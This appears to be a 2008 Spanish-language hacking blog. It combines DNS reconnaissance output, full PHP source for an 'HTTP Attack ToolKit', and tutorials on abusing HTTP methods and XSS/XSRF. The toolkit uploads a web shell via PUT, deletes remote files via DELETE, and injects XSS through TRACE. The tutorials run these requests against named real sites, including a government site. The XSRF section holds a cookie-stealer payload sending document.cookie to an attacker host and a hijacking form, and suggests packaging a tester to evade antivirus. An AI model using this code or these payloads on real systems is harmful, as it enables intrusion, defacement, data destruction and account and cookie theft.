                                        2008030601      ; Serial
                                        10800   ; Refresh
                                        3600    ; Retry
                                        1209600 ; Expire
                                        7200 )  ; Minimum TTL


[-]Servidores DNS:
ns1.awardspace.com
ns2.awardspace.com
ns3.awardspace.com
ns4.awardspace.com


[-]Buscando DNS Rotativos...:
IP: 82.197.131.52
Host: www7.awardspace.com

IP: 82.197.131.52
Host: www7.awardspace.com

[-]Obteniendo Informacion Extra:
atenea-linux.com.       3599    IN      SOA     ns1.awardspace.com. hostmaster.awardspace.com. (
                                        2008030601      ; Serial
                                        10800   ; Refresh
                                        3600    ; Retry
                                        1209600 ; Expire
                                        7200 )  ; Minimum TTL


[-]Intentando Obtener Zonas....: Usando: ns4.awardspace.com
No se Logro Obtener Zonas :(...Provando DNS Brutes Forces:
www.atenea-linux.com existe!
mail.atenea-linux.com existe!

Buscando DNS's Rotativos, denotamos que detecto awardspace como host de esa web, no se si es por el hack que le hicieron xD, o por que de por si el _ANtrAX_ lo puso ahi jejeje

IP: 82.197.131.52
Host: www7.awardspace.com

aparentemente esta en el servidor www7 de awardspace:

Código:

UxMal Desktop # nc -vvv 82.197.131.52 80
Warning: forward host lookup failed for www7.awardspace.com: Unknown host
www7.awardspace.com [82.197.131.52] 80 (http) open
GET / HTTP/1.1
Host: www.atenea-linux.com

HTTP/1.1 200 OK
Date: Fri, 07 Mar 2008 23:30:49 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

94c
<title>y0u 4r3 0wn3d m0th3r fuck3r !!  xDDDDD</title&gtl..... y de mas xD...

No se ustedes, pero a mi se me ocurre realizar un ataque por headers, en fin....

Menudo manual corto, pero bueno, creo que sirve de ejemplo del uso de mi tool jeje...

lo extender� despu�s...

HTTP Attack ToolKit By UxMal & Inyexion (sources code)

2008-08-18T13:12:00.000-07:00

consola.php


<h2>Consola HTTP</h2>
<form Method="POST" Action="">
<textarea name="consola" rows="20" cols="100">
<?php
if(isset($_POST["consola"]))  { $consola = $_POST["consola"];
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
if(!$sock) {
    echo "Puerto $puerto Cerrado";
}else{
$head = @fputs($sock, "$consola\n\n");
while(!feof($sock) ) {
$datos .= htmlentities(fgets($sock, 4096));
}
}
echo $datos;
}
echo '</textarea>
<input type="hidden" name="puerto" value="'.$puerto.'"><input type="hidden" name="host" value="'.$host.'">
<br><input type="submit" value="OK">
</form>';
?>

index.php


<?php
include("functions.php");

formulario();
opt();
if (isset($_GET["atack"])) switch($_GET["atack"]) {
case put:
put();
break;
case trace:
trace();
break;
case delete:
include("delete.php");
break;
case consola:
include("consola.php");
break;
case connect:
connect();
break;
default:
header("Location: index.php");
break;
}

?>

functions.php


<?php

###################################### FORMULARIO ###############################
function formulario()
{
echo"<html>
<center>
<title>HTTP Attack ToolKit By UxMal & InyeXion</title>
<form method="POST" action="">
<h1>HTTP Atack ToolKit By InyeXion & UxMal</h1>
<a>Host: <input name="host" size="17" type="text" value="".htmlentities($_REQUEST["host"]).""></a><br>
<a>Puerto: <input name="puerto" size="17" type="text" value="".htmlentities($_REQUEST["puerto"]).""></a><br>
<input type="submit" value="Scannear!">
<br>
</form></html>";
}

######################################## OPCIONES #################################
function opt()
{
error_reporting(0);
set_time_limit(0);
$TimeOut = 2;

if (isset($_POST["host"]) && isset($_POST["puerto"]))
{
$host = htmlentities($_POST["host"]);

if(is_numeric($_POST["puerto"]))
{
$puerto = htmlentities($_POST["puerto"]);
}else{
print "Solo Numeros!";
exit();
}
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
    echo "<h2>Puerto $puerto Cerrado</h2><br>";
    exit();
}
$header=htmlentities($_GET["header"]);
$socket = @fsockopen($header, 80, &$errno, &$errstr, 10);
$head = @fputs($sock, "OPTIONS / HTTP/1.0\n\n");

while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096));
}
list($basura, $todo) = explode("Server: ", $buffer);
list($server, $basura) = explode("\n", $todo);
unset($basura, $todo);

list($basura, $todo) = explode("Allow: ", $buffer);
list($allow, $basura) = explode("\n", $todo);
unset($basura, $todo);

echo "<b>Servidor: $server</b><br>";
echo "<b>Metodos Permitidos: $allow</b><br>";

if(ereg(" PUT, ", $allow)) echo "<br><a>Se ha Detectado El Metodo PUT, desea atacar? <a href="?atack=put&host=$host&puerto=$puerto">SI</a> | <a>No</a><hr>";
if(ereg(" DELETE, ", $allow))
{
echo "<br><a>Se ha Detectado El Metodo DELETE";
echo "
<center><form action="delete.php" method="POST">
<input type="hidden" name="host" value="".$host."">
<input type="hidden" name="puerto" value="".$puerto."">
<b>Especifica el archivo a borrar: </b><input type="text" name="borrar">
<input type="submit" name="subx" value="Borrar">
</form></center><hr>";
}
if(ereg(" TRACE", $allow)) echo "<br><a>Se ha Detectado El Metodo TRACE, desea atacar? <a href="?atack=trace&host=$host&puerto=$puerto">SI</a> | <a>No</a><hr>";
if(ereg(" CONNECT, ", $allow)) echo "<br><a>Altas Posibilidades De Ataque MITM, Desea Probar Un Ataque Tunneling? <a href="?atack=connect&host=$host&puerto=$puerto">SI</a> | <a>No</a><hr>";
include("consola.php");

}
}

######################################### PUT #####################################
function put()
{
$shell = "PWS.php";
if (isset($_GET["host"]) && isset($_GET["puerto"])) {
$host = htmlentities($_GET["host"]);
if(is_numeric($_GET["puerto"]))
{
$puerto = htmlentities($_GET["puerto"]);
}
if(!$TimeOut) $sock = @fsockopen($host, $puerto); else $sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
if(!$sock) {
    echo "<h2>Puerto $puerto Cerrado</h2><br>";
    exit();
}
$file = fopen($shell, "r");
$codigo = fread($file, filesize($shell));
fclose($file);
$lenght = strlen($codigo);
$head = @fputs($sock, "PUT /PWS.php HTTP/1.0\nHost: $host\nProxy-Connection: keep-alive\nContent-Type: multipart/form-data\nContent-Length: $lenght\nContent-Type: text/html\n\n$codigo\n\n");

while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096)); $buffer .= "<br>";
}
echo $buffer;
}
$error = "<br><br><b>Ataque Fallido, No Tenemos Permisos :(, Puedes Intentar con el header: Authorization.</b>";
$ok = "<br><br><b>Ataque Logrado :), Disfrutalo: http://$host/PWS.php</b>";

if(ereg("[HTTP/1.1 401 ]+[HTTP/1.1 301 ]+[HTTP/1.1 302 ]+[HTTP/1.1 203 ]+[HTTP/1.1 403 ]", $buffer))
{
echo $error;
}elseif(ereg("[HTTP/1.1 200 ]+[HTTP/1.1 201 ]+[HTTP/1.1 302 ]",$buffer))
{
echo $ok;
}

echo "<br><b>Posible Desborde de Buffer en Metodo PUT</b><br>";
}

######################################## TRACE ###################################
function trace()
{
$shell = "PWS.php";
if (isset($_GET["host"]) && isset($_GET["puerto"])) {
$host = htmlentities($_GET["host"]);
if(is_numeric($_GET["puerto"]))
{
$puerto = htmlentities($_GET["puerto"]);
}
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
    echo "<h2>Puerto $puerto Cerrado</h2><br>";
    exit();
}

$head = @fputs($sock, "TRACE / HTTP/1.0\nHost: $host\nXSS: <script>alert("XSS en TRACE")</script>\n\n");

while(!feof($sock) ) {
$buffer .= fgets($sock, 4096); $buffer .= "<br>";
}
echo $buffer;
if(ereg(""XSS en TRACE"", $buffer)) echo "<br><br><b>Vulnerable a XSS :)</b><br>";
if(ereg("TRACE / HTTP/1.0", $buffer)) echo "<br><b>Posibilidad de Ataques DoS, Mediante Consumo de Banda :)</b><br>";
}
}

#################################### CONNECT ################################
function connect()
{
if(isset($_GET["host"]) && isset($_GET["puerto"])) {
$host = htmlentities($_GET["host"]);
if(is_numeric($_GET["puerto"])) $puerto = $_GET["puerto"];
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
    echo "<h2>Puerto $puerto Cerrado</h2><br>";
    exit();
}

$head = @fputs($sock, "CONNECT www.google.com:80 HTTP/1.0\nHost: $host\nProxy-Connection: keep-alive\n\n");

while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096)); $buffer .= "<br>";
}
echo $buffer;
}
$error = "<br><br><b>Ataque Tuneling Fallido.</b>";
$ok = "<br><br><b>Ataque Tunneling Correcto :)</b>";

if(ereg("[HTTP/1.1 400 ]+[HTTP/1.1 405 ]+[HTTP/1.1 401 ]+[HTTP/1.1 301 ]+[HTTP/1.1 302 ]+[HTTP/1.1 302 ]+[HTTP/1.1 203 ]", $buffer))
{
echo $error;
}elseif(ereg("[HTTP/1.1 200 ]+[HTTP/1.1 201 ]",$buffer))
{
echo $ok;
}
}

delete.php


<?php
include("functions.php");
formulario();
opt();
if (isset($_POST["host"]) and isset($_POST["puerto"]) and isset($_POST["subx"])) {
$borrar = $_POST["borrar"];
$host = htmlentities($_GET["host"]);
if(is_numeric($_GET["puerto"]))
{
$puerto = $_GET["puerto"];
}
if(!$TimeOut)
{
$sock = @fsockopen($host, $puerto);
}else{
$sock = @fsockopen($host, $puerto, &$errno, &$errstr, $TimeOut);
}
if(!$sock) {
    echo "<h2>Puerto $puerto Cerrado</h2><br>";
    exit();
}
$head = @fputs($sock, "DELETE /$borrar HTTP/1.0\nHost: $host\nProxy-Connection: keep-alive\n\n");
$buffer = "";
while(!feof($sock) ) {
$buffer .= htmlentities(fgets($sock, 4096)); $buffer .= "<br>";
}
echo $buffer;
}
$error = "<br><br><b>Ataque Fallido, No Tenemos Permisos :(, Puedes Intentar con el header: Authorization.</b>";
$ok = "<br><br><b>Ataque Logrado :)</b>";

if(ereg("[HTTP/1.1 401 ]+[HTTP/1.1 301 ]+[HTTP/1.1 302 ]+[HTTP/1.1 203 ]", $buffer))
{
echo $error;
}elseif(ereg("[HTTP/1.1 200 ]+[HTTP/1.1 201 ]+[HTTP/1.1 302 ]",$buffer))
{
echo $ok;
}
?>

Demostracion Hacking HTTP

2008-08-18T13:05:00.000-07:00

Esto es solo un texto de introducci�n, para mas informaci�n leer sobre protocolo HTTP.

Le puse este titulo a la web, por que en este texto voy a explicar un poco de hackeo mediante M�todos HTTP y HTTP Headers.

Pocos texto se encuentran en la red sobre hackeo por m�todos HTTP, as� que muchos como yo tuvimos que aprender por las malas jaja, bueno comencemos:

Que es un Metodo HTTP?

Un Metodo HTTP es una forma u orden HTTP que es enviada a un servidor web para que dicho servidor maneje dicha informaci�n de dicha forma.

Ejemplo:

Citar

GET / HTTP/1.1
Host: google.com

En este caso estamos usando el m�todo GET, dicho m�todo sirve para obtener una pagina especifica.

Que es un Header?
Un Header es una especie de variable que contiene cierta informaci�n, como el header cookie, que contiene la cookie para el host actual.

Ejemplo:

Citar

GET / HTTP/1.1
Host: google.com
Cookie: cookie = alguna_cookie

En este caso hay 2 headers, el header Host, que le dice al servidor que web solicitamos (esto se usa en servers compartidos o dominios y subdominios) y el header cookie que contiene una cookie de nombre cookie y valor alguna_cookie (que ironia xD).

Que M�todos HTTP Existen?

Existen muchos m�todos HTTP como para listar todos, pero listare los mas usados y su uso:

GET: Solicita una pagina.
HEAD: Esto Devuelve solo los headers de la pagina solicitada.
OPTIONS: Solicita las opciones permitidas por el server web.
POST: Remite una informaci�n (como en un login).
TRACE: Es una especie de eco, es decir lo que env�es te contesta.
PUT: Guarda en su �rbol web el archivo o registro enviado.
CONNECT: Este M�todo crea una conexi�n con el servidor especificado, esto es �til para hacer tunnelings.
DELETE: Borra un Registro o Archivo especificado.

Vamos uno por uno con ejemplos:

Citar

UxMal ~ # nc -vvv www.cursohacker.com 80
DNS fwd/rev mismatch: www.cursohacker.com != alumnoz.com
www.cursohacker.com [64.246.22.103] 80 (http) open
OPTIONS / HTTP/1.1
Host: cursohacker.com

HTTP/1.1 200 OK
Date: Sat, 19 Jan 2008 21:18:54 GMT
Server: Apache/2.0.46 (Red Hat)
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Content-Type: application/x-httpd-php

sent 42, rcvd 183

Enviamos un Options, y nos devolvi� los m�todos:

Citar

Allow: GET,HEAD,POST,OPTIONS,TRACE

Me dir�n y esto de que nos sirve?
Simple:

El metodo TRACE, a realizar un eco, podemos utilizarlo para hacer un XSS, y por enden un Cookie Spoofing, al mismo tiempo esto puede ser usado para Saltar la protecci�n HTTPOnly de las cookies, y aparte de esto, las protecciones de Consumo de Banda quedan b�sicamente in�tiles, ya que casi ninguna filtra el m�todo TRACE, por ello la banda no se cuenta y se puede utilizar para floodear al servidor.

Citar

TRACE / HTTP/1.0
Host: cursohacker.com
XSS: <script>alert('UxMal Was Here')</script>

Citar

TRACE / HTTP/1.0
Host: cursohacker.com
DoS: mucho texto

Como ver�n hasta los de cursohacker.com tienen problemas con esto jejeje, Bueno Vamos por mas:

Citar

UxMal ~ # nc -vvv www.sep.gob.mx 80
Warning: inverse host lookup failed for 168.255.253.26: Unknown host
www.sep.gob.mx [168.255.253.26] 80 (http) open
OPTIONS / HTTP/1.0
Host: sep.gob.mx

HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0.0_09
Date: Sat, 19 Jan 2008 23:58:05 GMT
Content-length: 0
Content-type: text/html
Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
Connection: close

sent 37, rcvd 217

Permite:

Citar

GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS

Vamos a Probar DELETE:

Citar

UxMal ~ # nc -vvv www.sep.gob.mx 80
Warning: inverse host lookup failed for 168.255.253.26: Unknown host
www.sep.gob.mx [168.255.253.26] 80 (http) open
DELETE /index.htm HTTP/1.1
Host: sep.gob.mx

HTTP/1.1 401 Unauthorized
Server: Sun-ONE-Application-Server/7.0.0_09
Date: Sun, 20 Jan 2008 00:02:22 GMT
Content-length: 223
Content-type: text/html
WWW-authenticate: Basic realm="Sun ONE Application Server"

<HTML><HEAD><TITLE>Unauthorized&lt/TITLE></HEAD&gt
<BODY><H1>Unauthorized</H1>
Proper authorization is required for this area. Either your browser does not perform authorization, or your authorization has failed.
</BODY></HTML>

P�rese que tiene un ligero filtro, como lo saltamos?, simple, creamos un header WWW-authenticate, com�nmente los servidores no tienen un password seteado para esto o casi siempre el usuario y/o password es el dominio.

Un PUT:
El Header PUT, como ya dije sirve para crear un archivo o registro en el �rbol web del server.

Por ello sirve como upload:

Citar

PUT /hacked.htm HTTP/1.1
Host: www.sep.gob.mx
Content-Lengt: cantidad de bites del archivo

<h1>UxMal Was Here</h1>

CONNECT:

Citar

CONNECT 192.168.1.1 HTTP/1.1
Host: webvulnerable.com

GET / HTTP/1.0

De esta Forma nos conectar�amos a la ip 192.168.1.1 (ip privada) dentro de la red del servidor web y solicitamos /, Lo De mas Queda a la imaginaci�n...

Esto es solo un texto de introducci�n, para mas informaci�n leer sobre protocolo HTTP.

Nota: estos m�todos son un poco viejos, pero como demostr� aun sirve jejeje.

XSS a Otro Nivel

2008-08-18T12:58:00.000-07:00

XSS a Otro Nivel (Primera Parte)
Estas son mis técnicas de XSS no tan básicas:

Todos saben XSS aunque sea a un nivel muy básico, creo que muchos no pasan del clásico alert, pero bueno, intentare escribir un texto con un nivel un poco mas avanzado de tema y no me limitare solo a escribir de XSS en códigos webs, si no también en XSS en otros mecanismos.

XSRF

Cross-Site Request Forgery, es una técnica mediante la cual, con un solo clic se puede robar credenciales o información sensible sobre los usuarios (contraseñas, etcs...), ejemplo:

Supongamos que tenemos una web victima la cual tiene mas o menos el siguiente funcionamiento, el usuario tiene su panel, en el cual puede cambiar su dirección de correo, el cual se usa para digamos recuperar la contraseña, pero dicho formulario no contiene captcha ni nada similar... bueno ahora supongamos que usa un navegador que permite JS, un atacante puede pasarle un archivo en otro server, el cual al estar logeado el usuario, haga el envió de la petición y cambie el correo de la victima por el del atacante, y seguido de ello, envié un mensaje de recuperación de contraseña, entonces tendremos la password de la victima en nuestro correo. Esto seria mas o menos así:

Código:
<form name="formulario" action="http://victima.com/perfil.php" Method=POST>
<input type="hidden" name="email" value="uxmal666@gmail.com">
<input type="hidden" name="submit" value="enviar">
<SCRIPT>document.submit();</SCRIPT></form>

(aquí solo faltaría enviar el mensaje de recuperación de la password jeje)

Esta es mas o menos la esencia de esta clase de ataques, en si el usuario no notara que le están enviando un archivo que le robara su contraseña tan fácilmente, por que no aparece el intento de ataque en la barra de direcciones como comúnmente sucede con los XSS comunes. Tambien podemos usar un XSRF para mejorar un ataque XSS:

Código:
<form name='formulario' action='http://victima.com/login.php?user='><script>document.location = 'http://www.atacante.com/cookiestealer.php?cookie=' + document.cookie' Method=GET>
<SCRIPT>document.submit();</SCRIPT></form>

Errores DNS, un poco de ingeniería social y XSRF en un solo ataque (XSS Mixto):

Bueno esta técnica se me ocurrió hace mucho, dudo ser el único que la emplea, pero esta es una forma bastante especial de atacar.
Atacando php.net (muestra del ataque, sin motivos de conflicto):

Buscamos un perfil sensible en el DNS, en este caso he detectado esto:

Citar

[-]Intentando Ataque AXFR....: Usando: remote1.easydns.com
No se Logro Obtener Zonas :(...Detectando Comodin en Registros A...
No Se Detecto Comodin :).
Probando DNS Brutes Forces:
www.php.net existe!
www2.php.net existe!
localhost.php.net existe!
mail.php.net existe!
mx.php.net existe!
news.php.net existe!
cl.php.net existe!
es.php.net existe!
docs.php.net existe!
doc.php.net existe!

Ahora resolvemos la IP:

Código:

Xianur0 ~ # nslookup localhost.php.net
Server:         10.0.116.129
Address:        10.0.116.129#53

Non-authoritative answer:
Name:   localhost.php.net
Address: 127.0.0.1

127.0.0.1 jejeje..

Ponemos al netcat a la escucha en el 80, y entramos a esa dirección:

Código:

Xianur0 ~ # nc -vvvlp 80
listening on [any] 80 ...
connect to [127.0.0.1] from Xianur0 [127.0.0.1] 34640
GET / HTTP/1.1
Host: localhost.php.net
User-Agent: Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

Ok, tenemos al navegador hacia la IP local...
Creamos el tester:

#!/usr/bin/perl
#Tester XSS Mixto By Xianur0 (<script>alert(document.cookie)</script>)

 use Socket;
 my $port = 80;
 my $proto = getprotobyname('tcp');
 socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
 setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "Error: $!";
 my $paddr = sockaddr_in($port, INADDR_ANY);
 bind(SERVER, $paddr) or die "Error: $!";
 listen(SERVER, SOMAXCONN) or die "Error: $!";
 my $client_addr;
system("firefox http://localhost.php.net");
 while ($client_addr = accept(CLIENT, SERVER))
 {
 print CLIENT "<script>alert(document.cookie)</script>";
 close CLIENT;
}

y plop, nos abrirá el firefox con un alert() mostrando la cookie que tenemos en php.net (si es que tenemos).

podemos hacer un ejecutable (linux o windows) y los antivirus lo pasaran como si nada, por el simple hecho de que no hace conexiones externas, ya que usa como motor a los navegadores, pueden adaptar el código para que funcione con todos los navegadores y para que no solo lance un alert jejeje....

nota: la mayor parte de las webs de internet tienen configuraciones DNS similares a la que mostre arriba.